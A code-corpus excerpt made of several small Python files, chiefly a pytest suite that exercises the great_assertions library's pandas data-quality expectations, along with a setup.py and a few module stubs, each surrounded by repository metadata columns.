| 25.833333 | 103 | 0.870968 | 16 | 155 | 8.1875 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083871 | 155 | 5 | 104 | 31 | 0.922535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
6e91b20800ee5bc367aef45818f109c11b0acf21 | 120 | py | Python | passbook/core/admin.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | passbook/core/admin.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | passbook/core/admin.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | """passbook core model admin"""
from passbook.lib.admin import admin_autoregister
admin_autoregister("passbook_core")
| 20 | 49 | 0.808333 | 15 | 120 | 6.266667 | 0.533333 | 0.255319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091667 | 120 | 5 | 50 | 24 | 0.862385 | 0.208333 | 0 | 0 | 0 | 0 | 0.146067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
6eedafcefee18eb8dbcede389f60597447a91c2f | 33 | py | Python | OP-GAN/box_generation/seq2seq/evaluator/__init__.py | ts170/OP-GAN | b9a6227aaa7befa2025ea1f07e62e7a7e9c7ce1e | [
"MIT"
] | 34 | 2021-08-28T03:40:56.000Z | 2022-03-27T15:05:21.000Z | OP-GAN/box_generation/seq2seq/evaluator/__init__.py | ts170/OP-GAN | b9a6227aaa7befa2025ea1f07e62e7a7e9c7ce1e | [
"MIT"
] | 5 | 2021-09-02T09:33:22.000Z | 2022-03-23T03:15:56.000Z | OP-GAN/box_generation/seq2seq/evaluator/__init__.py | ts170/OP-GAN | b9a6227aaa7befa2025ea1f07e62e7a7e9c7ce1e | [
"MIT"
] | 5 | 2021-08-29T04:44:22.000Z | 2022-03-30T08:13:07.000Z | from .evaluator import Evaluator
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
42ddee8b21fe0b82d44bc5628b194b4f6f5949fb | 58 | py | Python | bceutils/__init__.py | AmorosTech/baidu-bceutils | f924d5e84c2f2e5b1aae8f1e3648041ee0a18ce1 | [
"Apache-2.0"
] | null | null | null | bceutils/__init__.py | AmorosTech/baidu-bceutils | f924d5e84c2f2e5b1aae8f1e3648041ee0a18ce1 | [
"Apache-2.0"
] | null | null | null | bceutils/__init__.py | AmorosTech/baidu-bceutils | f924d5e84c2f2e5b1aae8f1e3648041ee0a18ce1 | [
"Apache-2.0"
] | null | null | null | #
import bceutils.eip.eipbp
import bceutils.eip.eipgroup
| 11.6 | 28 | 0.810345 | 8 | 58 | 5.875 | 0.625 | 0.595745 | 0.723404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 58 | 4 | 29 | 14.5 | 0.903846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
6e08ea7129da3b0683267924c58ebe11b4da0707 | 1,668 | py | Python | setup.py | xavierxeon/PythonPackage | c4216dc3a1019d18216d0d2f9645b4b96f699ecc | [
"MIT"
] | null | null | null | setup.py | xavierxeon/PythonPackage | c4216dc3a1019d18216d0d2f9645b4b96f699ecc | [
"MIT"
] | null | null | null | setup.py | xavierxeon/PythonPackage | c4216dc3a1019d18216d0d2f9645b4b96f699ecc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import setuptools, platform
def main_apple_silicon():
with open("README.md", "r") as fh:
long_description = fh.read()
packages = setuptools.find_packages()
packages.remove('xxpystuff.pyside6') # needs pyside6
packages.remove('xxpystuff.media') # needs numpy and opencv
setuptools.setup(
name="xxpystuff",
version="0.0.8",
author="Ralf Waspe",
author_email="rwaspe@me.com",
description="A collection of python tools",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/xavierxeon/xxPyStuff",
license='MIT',
packages=packages,
install_requires=['colorama', 'todoist-python'],
include_package_data=True,
zip_safe=False,
)
def main():
with open("README.md", "r") as fh:
long_description = fh.read()
packages = setuptools.find_packages()
setuptools.setup(
name="xxpystuff",
version="0.0.8",
author="Ralf Waspe",
author_email="rwaspe@me.com",
description="A collection of python tools",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/xavierxeon/xxPyStuff",
license='MIT',
packages=packages,
install_requires=['colorama', 'pyside6', 'opencv-python', 'todoist-python'],
include_package_data=True,
zip_safe=False,
)
if __name__ == '__main__':
if platform.system() == 'Darwin' and platform.machine() == 'arm64':
main_apple_silicon()
elif platform.machine() == 'aarch64':
main_apple_silicon()
else:
main()
| 27.344262 | 82 | 0.657674 | 191 | 1,668 | 5.544503 | 0.403141 | 0.113314 | 0.071766 | 0.113314 | 0.721435 | 0.721435 | 0.721435 | 0.721435 | 0.721435 | 0.632672 | 0 | 0.01055 | 0.204436 | 1,668 | 60 | 83 | 27.8 | 0.787491 | 0.034772 | 0 | 0.708333 | 0 | 0 | 0.23771 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.020833 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6e1a49509ea13a6f4c98ea514b92d96caf1e5184 | 220 | py | Python | tests/devices/eiger/test_eiger_monitor.py | dls-controls/tickit | 00bb013e69674bcfe4926f365ecb3c65c080abe8 | [
"Apache-2.0"
] | 4 | 2021-09-16T13:35:33.000Z | 2022-02-01T23:35:53.000Z | tests/devices/eiger/test_eiger_monitor.py | dls-controls/tickit | 00bb013e69674bcfe4926f365ecb3c65c080abe8 | [
"Apache-2.0"
] | 46 | 2021-09-16T13:44:58.000Z | 2022-02-02T13:42:56.000Z | tests/devices/eiger/test_eiger_monitor.py | dls-controls/tickit | 00bb013e69674bcfe4926f365ecb3c65c080abe8 | [
"Apache-2.0"
] | null | null | null | import pytest
from tickit.devices.eiger.monitor.eiger_monitor import EigerMonitor
@pytest.fixture
def filewriter() -> EigerMonitor:
return EigerMonitor()
def test_eiger_monitor_constructor():
EigerMonitor()
| 16.923077 | 67 | 0.786364 | 24 | 220 | 7.041667 | 0.583333 | 0.213018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131818 | 220 | 12 | 68 | 18.333333 | 0.884817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | true | 0 | 0.285714 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6e27b55f12e3ca0334c09180dfc7fe413d8b3b5a | 118 | py | Python | weld/numpy_weld/core/__init__.py | radujica/data-analysis-pipelines | 64a6e5613cb1ab2ba2eb2f763c2aa1e3bc5e0d3b | [
"MIT"
] | 5 | 2018-03-05T13:19:35.000Z | 2020-11-17T15:59:41.000Z | weld/numpy_weld/core/__init__.py | radujica/data-analysis-pipelines | 64a6e5613cb1ab2ba2eb2f763c2aa1e3bc5e0d3b | [
"MIT"
] | 1 | 2021-06-01T22:27:44.000Z | 2021-06-01T22:27:44.000Z | weld/numpy_weld/core/__init__.py | radujica/data-analysis-pipelines | 64a6e5613cb1ab2ba2eb2f763c2aa1e3bc5e0d3b | [
"MIT"
] | null | null | null | from cartesian import duplicate_elements_indices, duplicate_array_indices, cartesian_product_indices, array_to_labels
| 59 | 117 | 0.915254 | 15 | 118 | 6.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059322 | 118 | 1 | 118 | 118 | 0.900901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6e3849058f501f816e17a9694e96763a7c9a6e8c | 28,454 | py | Python | tests/test_great_assertions_pandas.py | serialbandicoot/great-assertions | ab7b9e08fce940b5cb33065504fb2ce4c5c7cc47 | [
"Apache-2.0"
] | 10 | 2021-10-01T08:38:13.000Z | 2022-02-25T14:04:10.000Z | tests/test_great_assertions_pandas.py | serialbandicoot/great-assertions | ab7b9e08fce940b5cb33065504fb2ce4c5c7cc47 | [
"Apache-2.0"
] | 48 | 2021-10-04T15:41:59.000Z | 2022-03-30T05:41:50.000Z | tests/test_great_assertions_pandas.py | serialbandicoot/great-assertions | ab7b9e08fce940b5cb33065504fb2ce4c5c7cc47 | [
"Apache-2.0"
] | null | null | null | from great_assertions import GreatAssertions, NoValueFoundError
import pandas as pd
import pytest
class GreatAssertionPandasTests(GreatAssertions):
def test_pandas_incorrect_dataframe_type_raises_type_error(self):
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(1, "col_1", str)
assert "Not a valid pandas/pyspark DataFrame" == str(excinfo.value)
with pytest.raises(AssertionError) as excinfo:
            self.expect_column_values_to_be_in_set(1, "col_1", set(("Apple",)))
assert "Not a valid pandas/pyspark DataFrame" == str(excinfo.value)
def test_pandas_expect_table_row_count_to_equal(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_equal(df, 3)
def test_pandas_expect_table_row_count_to_equal_with_tolerance(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_equal(df, 3, tolerance=10)
def test_pandas_expect_table_row_count_to_equal_with_tolerance_within_range(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_equal(df, 4, tolerance=25)
def test_pandas_expect_table_row_count_to_equal_with_tolerance_fail(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_row_count_to_equal(df, 4, tolerance=20)
assert (
"expected row count failed tolerance range 3.2-4.8 the actual was 3 : "
== str(excinfo.value)
)
def test_pandas_expect_table_row_count_to_equal_fails(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_row_count_to_equal(df, 4)
assert "expected row count is 4 the actual was 3 : " == str(excinfo.value)
def test_pandas_expect_table_row_count_to_be_greater_than(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_be_greater_than(df, 2)
def test_pandas_expect_table_row_count_to_be_greater_than_fails(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_row_count_to_be_greater_than(df, 4)
assert "expected row count of at least 4 but the actual was 3 : " == str(
excinfo.value
)
def test_pandas_expect_table_row_count_to_be_less_than(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_be_less_than(df, 4)
def test_pandas_expect_table_row_count_to_be_less_fails(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_row_count_to_be_less_than(df, 2)
assert "expected row count of maximum 2 but the actual was 3 : " == str(
excinfo.value
)
def test_pandas_expect_table_has_no_duplicate_rows(self):
df = pd.DataFrame({"col_1": [100, 100, 300], "col_2": [10, 11, 12]})
self.expect_table_has_no_duplicate_rows(df)
def test_pandas_expect_table_has_no_duplicate_rows_fail(self):
df = pd.DataFrame({"col_1": [100, 100, 300], "col_2": [10, 10, 12]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_has_no_duplicate_rows(df)
assert "Table contains duplicate rows : " == str(excinfo.value)
def test_pandas_assert_expect_column_values_to_be_between(self):
# int
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_column_values_to_be_between(
df, "col_1", min_value=99, max_value=301
)
self.expect_column_values_to_be_between(df, "col_1", 100, 300)
# float
df = pd.DataFrame({"col_1": [100.02, 200.01, 300.01], "col_2": [10, 20, 30]})
self.expect_column_values_to_be_between(df, "col_1", 100.01, 300.02)
# Equality float
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05], "col_2": [10, 20, 30]})
self.expect_column_values_to_be_between(df, "col_1", 100.05, 300.05)
def test_pandas_assert_expect_column_values_to_be_between_ignore_nan(self):
df = pd.DataFrame({"col_1": [None, 100, None, 300]})
self.expect_column_values_to_be_between(
df, "col_1", min_value=99, max_value=301
)
self.expect_column_values_to_be_between(df, "col_1", 100, 300)
def test_pandas_assert_expect_column_values_to_be_between_all_none_fail(self):
df = pd.DataFrame({"col_1": [None, None, None, None]})
with pytest.raises(NoValueFoundError) as excinfo:
self.expect_column_values_to_be_between(
df, "col_1", min_value=99, max_value=301
)
assert "A min-max could not be generated" == str(excinfo.value)
def test_pandas_assert_expect_column_values_to_be_between_min_fail(
self,
):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_between(df, "col_1", 101, 301)
assert (
"Min value provided (101) must be less than column col_1 value of 100 : "
== str(excinfo.value)
)
def test_pandas_assert_expect_column_values_to_be_between_min_fail_bad_syntax(
self,
):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_between(df, "col_1", 100, 50)
assert "Max value must be greater than min value : " == str(excinfo.value)
def test_pandas_assert_expect_column_values_to_be_between_max_fail(
self,
):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_between(df, "col_1", 99, 299)
assert (
"Max value provided (299) must be greater than column col_1 value of 300 : "
== str(excinfo.value)
)
def test_pandas_assert_expect_column_values_to_match_regex(self):
df = pd.DataFrame({"col_1": ["BA2", "BA15", "Sw1"]})
self.expect_column_values_to_match_regex(df, "col_1", "^[a-zA-Z]{2}[0-9]{1,2}$")
def test_pandas_assert_expect_column_values_to_match_regex_fail(self):
df = pd.DataFrame({"col_1": ["bA2", "BA151", "SW1", "AAA13"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_match_regex(
df, "col_1", "^[a-zA-Z]{2}[0-9]{1,2}$"
)
assert "Column col_1 did not match regular expression, found BA151 : " == str(
excinfo.value
)
def test_pandas_assert_expect_column_values_to_be_in_set(self):
fruits = ["Apple", "Orange", "Pear", "Cherry", "Apricot(Summer)"]
fruits_set = set(("Apple", "Orange", "Pear", "Cherry", "Apricot(Summer)"))
df = pd.DataFrame({"col_1": fruits})
self.expect_column_values_to_be_in_set(df, "col_1", fruits_set)
def test_pandas_assert_expect_column_values_to_be_in_set_case(self):
fruits = ["Apple", "Orange and Apples", "Pear", "Cherry"]
fruits_set = set(("apple", "Orange And Apples", "pear", "cherry"))
df = pd.DataFrame({"col_1": fruits})
self.expect_column_values_to_be_in_set(
df, "col_1", fruits_set, ignore_case=True
)
def test_pandas_assert_expect_column_values_to_be_in_set_fail(self):
fruits = set(("Apple", "Orange", "Pear", "Cherry"))
df = pd.DataFrame({"col_1": ["Tomato", "Cherry", "Apple"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_in_set(df, "col_1", fruits)
assert (
"Column col_1 provided set was not in actaul set of Apple, Cherry, Tomato : "
== str(excinfo.value)
)
def test_pandas_assert_expect_column_values_to_be_in_set_fail_with_type(
self,
):
fruits = set(("Apple", "Orange", "Pear", "Cherry"))
df = pd.DataFrame({"col_1": ["Tomato", 1.0, "Apple"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_in_set(df, "col_1", fruits)
assert (
"Column col_1 provided set was not in actaul set of Tomato, 1.0, Apple : "
== str(excinfo.value)
)
def test_pandas_expect_column_values_to_be_of_type(self):
df = pd.DataFrame(
{
"col_1": ["BA2", "BA15", "SW1"],
"col_2": [10, 20, 30],
"col_3": [10.45, 20.32, 30.23],
}
)
self.expect_column_values_to_be_of_type(df, "col_1", str)
self.expect_column_values_to_be_of_type(df, "col_2", int)
self.expect_column_values_to_be_of_type(df, "col_3", float)
def test_pandas_expect_column_values_to_be_of_type_fail_type(self):
df = pd.DataFrame(
{
"col_1": ["BA2"],
}
)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(df, "col_1", object)
assert "Please check available types; str, float, int : " == str(excinfo.value)
def test_pandas_expect_column_values_to_be_of_type_fail(self):
df = pd.DataFrame(
{
"col_1": ["BA2", "BA15", "SW1"],
"col_2": [10, 20, 30],
"col_3": [10.45, 20.32, 30.23],
}
)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(df, "col_1", int)
assert "Column col_1 was not type <class 'int'> : " == str(excinfo.value)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(df, "col_2", float)
assert "Column col_2 was not type <class 'float'> : " == str(excinfo.value)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(df, "col_3", str)
assert "Column col_3 was not type <class 'str'> : " == str(excinfo.value)
def test_assert_pandas_expect_table_columns_to_match_ordered_list(
self,
):
df = pd.DataFrame({"col_1": [100], "col_2": ["a"], "col_3": [1.01]})
self.expect_table_columns_to_match_ordered_list(
df, list(("col_1", "col_2", "col_3"))
)
def test_assert_pandas_expect_table_columns_to_match_ordered_list_fail(
self,
):
df = pd.DataFrame({"col_1": [100], "col_2": ["a"], "col_3": [1.01]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_columns_to_match_ordered_list(
df, list(("col_2", "col_1", "col_3"))
)
assert (
"Ordered columns did not match ordered columns col_1, col_2, col_3 : "
== str(excinfo.value)
)
def test_assert_pandas_expect_table_columns_to_match_set(self):
df = pd.DataFrame({"col_1": [100], "col_2": ["a"], "col_3": [1.01]})
self.expect_table_columns_to_match_set(df, set(("col_1", "col_2", "col_3")))
self.expect_table_columns_to_match_set(df, set(("col_2", "col_1", "col_3")))
self.expect_table_columns_to_match_set(df, list(("col_1", "col_2", "col_3")))
self.expect_table_columns_to_match_set(df, list(("col_2", "col_1", "col_3")))
def test_assert_pandas_expect_table_columns_to_match_set_fail(self):
df = pd.DataFrame({"col_1": [100], "col_2": ["a"], "col_3": [1.01]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_columns_to_match_set(df, set(("col_2", "col_1")))
assert "Columns did not match set found col_1, col_2, col_3 : " == str(
excinfo.value
)
with pytest.raises(AssertionError) as excinfo:
self.expect_table_columns_to_match_set(df, list(("col_2", "col_1")))
assert "Columns did not match set found col_1, col_2, col_3 : " == str(
excinfo.value
)
def test_assert_expect_date_range_to_be_less_than(self):
df = pd.DataFrame({"col_1": ["2019-05-13", "2018-12-12", "2015-10-01"]})
self.expect_date_range_to_be_less_than(df, "col_1", "2019-05-14")
def test_assert_expect_date_range_to_be_less_than_default(self):
df = pd.DataFrame({"col_1": ["", None]})
self.expect_date_range_to_be_less_than(df, "col_1", "1900-01-02")
def test_assert_expect_date_range_to_be_less_than_formatted(self):
df = pd.DataFrame({"col_1": ["2019/05/13", "2018/12/12", "2015/10/01"]})
self.expect_date_range_to_be_less_than(
df, "col_1", "2019/05/14", date_format="%Y/%m/%d"
)
def test_assert_expect_date_range_to_be_less_than_fail(self):
df = pd.DataFrame({"col_1": ["2019-05-13", "2018-12-12", "2015-10-01"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_less_than(df, "col_1", "2019-05-13")
assert (
"Column col_1 date is greater or equal than 2019-05-13 found 2019-05-13 : "
== str(excinfo.value)
)
def test_assert_expect_date_range_to_be_more_than(self):
df = pd.DataFrame({"col_1": ["2019-05-13", "2018-12-12", "2015-10-01"]})
self.expect_date_range_to_be_more_than(df, "col_1", "2015-09-30")
def test_assert_expect_date_range_to_be_more_than_default(self):
df = pd.DataFrame({"col_1": [""]})
self.expect_date_range_to_be_more_than(df, "col_1", "1899-12-31")
def test_assert_expect_date_range_to_be_more_than_fail(self):
df = pd.DataFrame({"col_1": ["2019-05-13", "2018-12-12", "2015-10-01"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_more_than(df, "col_1", "2015-10-01")
assert (
"Column col_1 is less or equal than 2015-10-01 found 2015-10-01 : "
== str(excinfo.value)
)
def test_assert_expect_date_range_to_be_between(self):
df = pd.DataFrame({"col_1": ["2010-01-02", "2025-01-01"]})
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-01", date_end="2025-01-02"
)
def test_assert_expect_date_range_to_be_between_start_date_greater_than_end(
self,
):
df = pd.DataFrame({"col_1": ["1975-01-01"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="1950-01-02", date_end="1950-01-01"
)
assert (
"Column col_1 start date 1950-01-02 cannot be greater than end_date 1950-01-01 : "
== str(excinfo.value)
)
def test_assert_expect_date_range_to_be_between_fail(self):
df = pd.DataFrame({"col_1": ["2010-01-02", "2025-01-02"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-03", date_end="2025-01-03"
)
assert (
"Column col_1 is not between 2010-01-03 and 2025-01-03 found 2010-01-02 : "
== str(excinfo.value)
)
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-01", date_end="2025-01-01"
)
assert (
"Column col_1 is not between 2010-01-01 and 2025-01-01 found 2025-01-02 : "
== str(excinfo.value)
)
def test_assert_expect_date_range_to_be_between_fail_equal(self):
df = pd.DataFrame({"col_1": ["2010-01-02", "2025-01-02"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-02", date_end="2025-01-03"
)
assert (
"Column col_1 is not between 2010-01-02 and 2025-01-03 found 2010-01-02 : "
== str(excinfo.value)
)
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-01", date_end="2025-01-02"
)
assert (
"Column col_1 is not between 2010-01-01 and 2025-01-02 found 2025-01-02 : "
== str(excinfo.value)
)
def test_expect_column_mean_to_be_between(self):
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05]})
self.expect_column_mean_to_be_between(df, "col_1", 100.0, 400.0)
def test_expect_column_mean_to_be_between_min_greater_than_max_fail(
self,
):
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_mean_to_be_between(df, "col_1", 200.0, 100.0)
assert (
"Column col_1 min_value 200.0 cannot be greater than max_value 100.0 : "
== str(excinfo.value)
)
def test_expect_column_mean_to_be_between_fail_min_value(self):
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_mean_to_be_between(df, "col_1", 300.0, 400.0)
assert "Column col_1 mean 200.03667 is less than min_value 300.0 : " == str(
excinfo.value
)
def test_expect_column_mean_to_be_between_fail_max_value(self):
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_mean_to_be_between(df, "col_1", 100.0, 200.0)
assert "Column col_1 mean 200.03667 is greater than max_value 200.0 : " == str(
excinfo.value
)
def test_expect_column_value_counts_percent_to_be_between(self):
df = pd.DataFrame(
{
"col_1": ["Y", "Y", "N", "Y", "Y", "N", "N", "Y", "N", ""],
}
)
value_counts = {
"Y": {"min": 45, "max": 55},
"N": {"min": 35, "max": 45},
"": {"min": 5, "max": 15},
}
self.expect_column_value_counts_percent_to_be_between(df, "col_1", value_counts)
def test_expect_column_value_counts_percent_to_be_between_fail_min(self):
df = pd.DataFrame(
{
"col_1": ["Y", "Y", "N", "Y", "Y", "N", "N", "Y", "Y", "", "N", ""],
}
)
value_counts = {"Y": {"min": 55, "max": 65}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert (
"Column col_1 the actual value count of (Y) is 50.00000% is less than the min allowed of 55% : "
== str(excinfo.value)
)
def test_expect_column_value_counts_percent_to_be_between_fail_max(self):
df = pd.DataFrame(
{
"col_1": ["Y", "Y", "N", "Y", "Y", "N", "N", "Y", "Y", "", "N", ""],
}
)
value_counts = {"Y": {"min": 35, "max": 40}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert (
"Column col_1 the actual value count of (Y) is 50.00000% is more than the max allowed of 40% : "
== str(excinfo.value)
)
def test_expect_column_value_counts_percent_to_be_between_fail_key_error(self):
df = pd.DataFrame(
{
"col_1": ["Y", "N", "Maybe"],
}
)
value_counts = {"Yes": {"min": 0, "max": 0}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert (
"Check the key 'Yes' is not in the available value counts names Maybe, N, Y : "
== str(excinfo.value)
)
def test_expect_column_value_counts_percent_to_be_between_fail_min_max_key_error(
self,
):
df = pd.DataFrame(
{
"col_1": ["Y"],
}
)
# Assert verify min
value_counts = {"Y": {"minimum": 0, "max": 0}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert "Value count for key 'Y' not contain 'min' : " == str(excinfo.value)
# Assert verify max
value_counts = {"Y": {"min": 0, "maximum": 0}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert "Value count for key 'Y' not contain 'max' : " == str(excinfo.value)
def test_expect_assert_frame_equal(self):
left = pd.DataFrame({"col_1": [1]})
right = pd.DataFrame({"col_1": [1]})
self.expect_frames_equal(left, right)
def test_expect_assert_frame_equal_dtype(self):
left = pd.DataFrame({"col_1": [1, 2]})
right = pd.DataFrame({"col_1": [1, 2]})
left = left.astype({"col_1": "int32"})
        right = right.astype({"col_1": "int64"})
self.expect_frames_equal(left, right, check_dtype=False)
def test_expect_assert_frame_equal_ignore_index(self):
df = pd.DataFrame({"col_1": [2, 1]})
left = df[df["col_1"] == 1]
right = pd.DataFrame({"col_1": [1]})
self.expect_frames_equal(left, right, check_index=False)
def test_expect_assert_frame_equal_bad_type(self):
from pyspark.sql import SparkSession
left = pd.DataFrame({"col_1": [1]})
spark = SparkSession.builder.getOrCreate()
right = spark.createDataFrame([{"col_1": 100}])
with pytest.raises(AssertionError) as excinfo:
self.expect_frames_equal(left, right)
assert "Different DataFrame types : " == str(excinfo.value)
def test_expect_assert_frame_equal_fail(self):
left = pd.DataFrame({"col_1": [1]})
right = pd.DataFrame({"col_1": [2]})
with pytest.raises(AssertionError) as excinfo:
self.expect_frames_equal(left, right)
# Just check the GA code, the fail is returned
# with panda exception or the GASpark code
assert "DataFrames are different" in str(excinfo.value)
def test_expect_column_value_to_equal(self):
df = pd.DataFrame({"col_1": [1, 1, 1, 1]})
self.expect_column_value_to_equal(df, "col_1", 1)
